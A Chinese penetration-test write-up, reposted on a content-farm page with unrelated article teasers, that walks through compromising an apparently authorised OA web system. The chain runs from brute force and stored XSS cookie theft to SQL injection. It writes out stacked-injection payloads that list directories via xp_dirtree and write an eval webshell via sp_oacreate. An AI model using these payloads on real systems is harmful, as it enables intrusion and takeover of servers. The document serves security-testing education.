shell脚本教学(记录又一次实战GetShell)
shell脚本教学(记录又一次实战GetShell)
2024-11-05 04:36:21  作者:个圈套  网址:https://m.xinb2b.cn/life/efm160661.html

严正声明

截至发稿前,已将漏洞提交厂商并验证其已完成修复。本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天网安实验室及原作者无关,本文为合天网安实验室原创,如需转载,请注明出处!

前言

本文为记录实战过程中遇到的问题及思考,旨在思路分享及自我总结。文中涉及目标站点为SRC授权站点,为防止漏打码已对实际链接进行了部分删减,如去除了链接目录名等。整个测试过程涉及未授权访问、暴力破解、存储型XSS、SQL注入,到最后拿shell,过程略微曲折。

信息收集

打开目标站点,为系统登录界面。安装VNC远程协助链接到内网地址,经测试登录无验证码及失败次数锁定,可尝试暴力破解,此处先做信息收集。



目标站点:http://1.2.3.4/login.aspx脚本:aspx,通过登录页面可知;服务器:IIS7.5,通过404、403报错页面可得;数据库:可能为SQL Server,常见组合;

安全防护:未知,对IP进行端口扫描会封一段时间,但测试and 1=1不拦,无WAF或未开启严格的防护策略;

通过查看返回包,发现Server为nginx/1.17.2,判断应该存在反向代理。


暴力破解

通过对现有信息的分析,优先选择暴力破解,系统首页登录为密码md5前端加密后传输,此处爆破需选择burp的HASH-MD5后进行爆破。系统登录失败返回信息都为“登录失败xxx”,无法确认是否存在用户。




查看页面源码发现存在http://1.2.3.4/client/此页面未对密码进行md5加密,即首页:http://1.2.3.4/ 密码加密后传输Client:http://1.2.3.4/client/ 密码明文传输



此处用http://1.2.3.4/client/ 进行爆破,不需要进行MD5加密可提高效率,但使用name500及自定义字典,包括常见测试账号,及3位数字,4位数字,5位数字等组成5000多个用户名,爆破密码123456、888888、111111,结果一个都没爆破到。

当时的思路是先确定用户名,例如工号等,再去爆破其中存在弱口令的账号,并未想着直接爆破admin,因为那时觉得后台可能不在这里登录,现在想想也可以直接盲爆admin用户。

所以那时先收集用户名,使用Google语法,Site:xxx 工号,但并没有收获。针对只有登录界面的系统,只有掌握了用户名的规律,才能提高爆破的机率,此处很有可能是工号。用户名收集无果,便打开了目录扫描,看看有无敏感信息。

未授权访问

通过对站点进行目录扫描,存在以下目录及文件。


main.aspx访问弹登陆超时,跳转登陆界面,禁用js返回页面如下:


逐一进行访问:css.aspx访问弹出登陆超时,跳转登陆界面,禁用js访问空白;reg.aspx访问为软件注册页面;


查看源码,发现存在main_d.aspx如下:


禁用js访问main_d.aspx返回以下页面:


继续查看源码,发现以下地址通过对站点进行目录扫描,存在以下目录及文件。


禁用js访问http://1.2.3.4/MyWork/Richeng/RichengmyList_show.aspx?id=12点击修改,此处已测试id不存在SQL注入。



该页面存在大量附件,其中有体检附件登记表,点击下载链接如下:


点击下载跳转登陆界面


此处感觉是有任意文件下载,但可能需要登录,后续爆破出账户后可测试。http://1.2.3.4/file_down.aspx?number=file/liaotian/201922xx.xls

需下载文件,尝试构造http://1.2.3.4/file/liaotian/201922xx.xls



如上获取到该单位的员工工号,使用excel生成工号列表进行暴力破解。

登录系统

上述已获取工号组合,生成01111-05555进行爆破,使用密码123456、111111、888888、123qwe、qwe123、123123、123321。当使用密码123321时,成功爆破出一个弱口令用户。


使用该账号登录系统


系统功能模块较多,测试前面的文件下载http://1.2.3.4/file_down.aspx?number=file/liaotian/201922xx.xls


尝试下载web.confighttp://1.2.3.4/file_down.aspx?number=web.config


测试不存在任意文件下载,修改文件后是直接Location到文件,从而下载,后续对系统的功能点逐个进行测试。

文件上传

后台功能主要存在以下4个上传点。上传点1-印章上传:


上传点2-邮件附件:


上传点3-头像上传


上传点4:KindEditor 4.1.10 编辑器,貌似无解。上传点1,文件上传后的路径为:/seal/2021815238.png此目录未限制禁止脚本执行,但无法上传脚本文件,尝试绕过均失败。


上传点2,文件上传后的路径为:/file/emailfile/2021081523.png

此目录限制了脚本执行,即/file目录下不能执行脚本文件。

此上传点可上传aspx等文件,但上传后后缀为.unknow

后续通过注入点发现上传后缀写在数据库中,可以通过update语句增加后缀,但并无跨目录的方法,即使上传了aspx脚本文件,也无法执行。

上传文件后截图如下:


后续查看数据库,允许上传的文件后缀如下:


上传点3,任意文件上传,上传后路径为/SystemManage/User/file/ 下,测试目录限制脚本执行,无法跨目录。


存储型XSS

上面针对后台上传功能测试后无法上传getshell,便考虑是否能找到高权限账号,管理员账号可能有修改上传文件格式的权限。

此时测试邮件存在存储型XSS,发送邮件可以打用户cookie。

发送邮件给自己,收件箱打开时:


可以给管理员发送带XSS的邮件,当管理员打开邮件时,即可以获取管理员的cookie,此处配合server酱,可实现获取cookie后微信提醒通知,同样发送邮件给自己测试。

编写邮件,插入XSS平台payload。


收件箱点开后


微信收到Server酱通知



登录XSS平台查看,成功获取用户cookie信息


此处构造好XSS后,给管理员发送了标题为【问题建议】的邮件,增加管理员打开的概率,即打开邮件可获取管理员的cookie。


同时在邮件选择收件人处,发现组织架构处,可列举所有用户的工号、科室、姓名信息。


故可以收集用户工号,此处发现管理员即为admin,在等待xss的同时,也构造字典对admin进行爆破。


然后竟然成功爆破出了admin的密码,看了下密码在“全国弱口令TOP1000”中没有,如果一开始就爆破admin,可能也爆不出来,个人习惯是爆TOP1000,当初也确定不了管理员就是admin。

此处也说明有一个强字典是多么的重要。


使用admin登录系统后,只多了以下两个功能模块,很失望并没有可以修改上传设置的功能。


测试发现登录管理员也并没啥用,还是无法getshell,既然上传无门,那就寻找注入点,如果是sa的注入点则getshell的机率大很多。

SQL注入

于是又重新回到后台各个功能点进行测试,经过一番测试终于发现了一个注入点,链接如下:测试1=1页面正常


测试1=2页面异常


爆数据库版本信息


如上确认存在SQL注入,使用sqlmap进行利用,当前用户为SA。


测试使用—os-shell命令失败,可能是有安全设备拦截。


此时也对数据库的大致表进行查看,发现了管理后台某个点的文件上传格式可在数据库设置后缀,但无法跨目录,故即使能上传脚本也无法getshell。

Getshell

经手工测试注入点支持堆叠注入,此处尝试使用sp_oacreate写马,SQL如下:declare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'c:\shell.asp',1;EXEC sp_oamethod @f,'WriteLine',null,'<%eval request("cmd")%>'

但需知道网站根目录,此处可以使用xp_dirtree进行目录遍历,SQL如下:create table dirs(subdirectory varchar(255),depth int, filee int);insert dirs exec xp_dirtree 'c:\',1,1

建立表后,先执行以下查询,此处为查询c盘目录下的文件夹及文件:http://1.2.3.4/WorkFlow/AddWorkFlow_add_Next.aspx?tmp=0.8307731177113578&add=&UpNodeNum=11,&FlowNumber=20189139012187';insert dirs exec xp_dirtree 'c:\',1,1;--&FormId=86&Number=202181414


页面返回正常,则语句执行成功,再去sqlmap查询dirs表下的内容,即为c盘的目录内容:


利用上述方式成功找到网站根目录为d:\OA\ 下。执行SQL语句写入文件shell.aspdeclare @f int,@g int;exec sp_oacreate 'Scripting.FileSystemObject',@f output;EXEC SP_OAMETHOD @f,'CreateTextFile',@f OUTPUT,'d:\OA\shell.asp',1;EXEC sp_oamethod @f,'WriteLine',null,'<%eval request("cmd")%>'

打开链接:http://1.2.3.4/shell.asp 空白,中国菜刀连接成功。


上传冰蝎,后续可以进行socks代理,从而进入内网。


通过systeminfo收集系统信息,可用于后续提权。


以上成功获得目标站点shell。

总结

渗透测试很多时候需要的细心和耐心再加上一点运气,当我们在后台无法getshell时,可以尝试去找后台的SQL注入,高权限的注入点可以直接写shell。

又或者当我们有一个SQL注入点却没法写shell时,可以尝试读管理员账号密码,登录后台测试是否有文件上传漏洞,从而进行拿shell。关注不同的漏洞危害,并进行组合利用,往往可以达到出其不意的效果。

至此全篇完,感谢阅读,希望您能从中有所收获。

  • 逆袭人生的三大技巧(她逆袭改命180斤的废柴)
  • 2024-11-05她逆袭改命180斤的废柴香港2021年叱吒乐坛流行榜在元旦当天颁奖,歌手郑欣宜将“女歌手金奖”和“我最喜爱女歌手”双双拿下要知道,叱咤乐坛歌手金奖从1988年开始设立,获奖者从张国荣、Beyond、梅艳芳、林忆莲到四大天王,。
  • 石女会感觉到自己是石女吗(你听说过石女吗)
  • 2024-11-05你听说过石女吗对于女性来说,到了第二性征发育时间,通常会有一个外在表现,比如说来月经月经初潮的到来,暗示着女性生殖系统已经开始成熟了,同时也已经具备了生育能力但是,很多人可能会在十三四岁的时候,没有准时来月经,但是。
  • 如何学习英语演讲儿童(儿童学习英语演讲的方法)
  • 2024-11-05儿童学习英语演讲的方法儿童学习英语演讲的方法第一,中英混合在训练的初级阶段,因为水平较低,会说的英语单词也比较有限,就只能采用这种中英混合的形式一开始,每次讲一段话,只能说上几个英语单词在训练一段时间之后,能说的单词逐渐增。
  • 女教师拽绳上课(新加坡变态老师喜欢看内裤)
  • 2024-11-05新加坡变态老师喜欢看内裤新加坡教育、房产、创业、移民、同城活动、吃喝玩乐、资讯八卦、商家优惠……一网打尽老师给人的印象通常都是温文尔雅,为人师表,但41岁的小学老师郑福文(音)却不是这样,他有一个不为人知的变态嗜好——看小男。
  • 活着真好作文(活着真好作文范文)
  • 2024-11-05活着真好作文范文我庆幸我活着,享受生命赐予我的一切权利以前,我总抱怨着生活常常给我以困难,常常狠狠地咒骂命运的崎岖,怨恨人生绊脚石太多,玫瑰花茎上有刺等等,人才16岁,却好似61岁般地嚷嚷着:活着好累是呀!活着真的好。
  • 星爷最好镜头(这是星爷众多电影中最烂的一部)
  • 2024-11-05这是星爷众多电影中最烂的一部这是周星驰在众多电影中最烂的一部,不仅票房扑街,让片方亏损了1000多万,甚至还导致周星驰的新公司直接关门而就是这么一部烂片,却成为了影迷心中公认的经典这部电影就是大话西游大话西游刚在内地上映的时候,。
  • 车里有灰尘清理小妙招(车内灰尘可以用什么工具去除呢)
  • 2024-11-05车内灰尘可以用什么工具去除呢清洁软胶众所周知,车内部有着许许多多的缝隙,一旦不定期清理,就会落下灰尘,长此以往就很难清理,用毛巾也无济于事而且,汽车空调的出风口也是不好清理这时,我们可以利用清洁软胶,放在需要清洁的部位按压后拉起。
  • 关于日落的唯美文案大全 让你一眼惊艳的黄昏日落浪漫文案
  • 2024-11-05关于日落的唯美文案大全 让你一眼惊艳的黄昏日落浪漫文案那青藤爬上檐瓦,黄昏时邂逅了晚霞其实,最美的不是黄昏,而是与你立黄昏的那一人1.我在人间贩卖黄昏,只为收集世间温柔去见你2.比起日出,我更喜欢日落,我的意思是,比起遇见你,我更喜欢与你终老3.傍晚的光。
  • 林青霞张曼玉钟楚红电影全集(比林青霞还红霸王花)
  • 2024-11-05比林青霞还红霸王花上世纪八十年化诞生了许多美女明星,数目那真叫多,随便说几个都是女神然而又有动作又是女神级别的却不多,但小编今天要介绍的这位,那是集颜值和演技为一流的女星,反正,就是动作女星中的林青霞吧先上靓照张,看仔。
  • 荒野行动赛季集结任务还能完成吗(诛仙任务志在必得)
  • 2024-11-05诛仙任务志在必得随着百人枪战竞技游戏的火热,外挂也成为了游戏厂商们不得不面对的问题腾讯代理的游戏《绝地求生》在国外就曾多次因为外挂泛滥问题向玩家道歉,连知名主播也承认使用外挂外挂用户上天遁地,步行追车,百步穿杨,“凡。
  • 文案架构的问题及解决方案(原来文案也可以这样分析)
  • 2024-11-05原来文案也可以这样分析如何辨别一个文案好还是坏?试试矩阵分析小提示:阅读的目的是引发思考,思考的目的学习融合观点,不要为了看故事而阅读有时候我们觉得这篇文案写的好,但具体好在哪里?为什么好?很难用逻辑去概括最近在学习矩阵,。
  • 银川客运恢复安排(银川所有客运班车暂停营运)
  • 2024-11-05银川所有客运班车暂停营运经宁夏银川市应对新冠肺炎疫情工作指挥部批准,从2021年10月24日12时期,临时关闭银川汽车站、银川旅游汽车站、银川汽车西站,所有客运班车全部暂停营运,具体恢复运营时间另行通知近期,非必要不离开银川。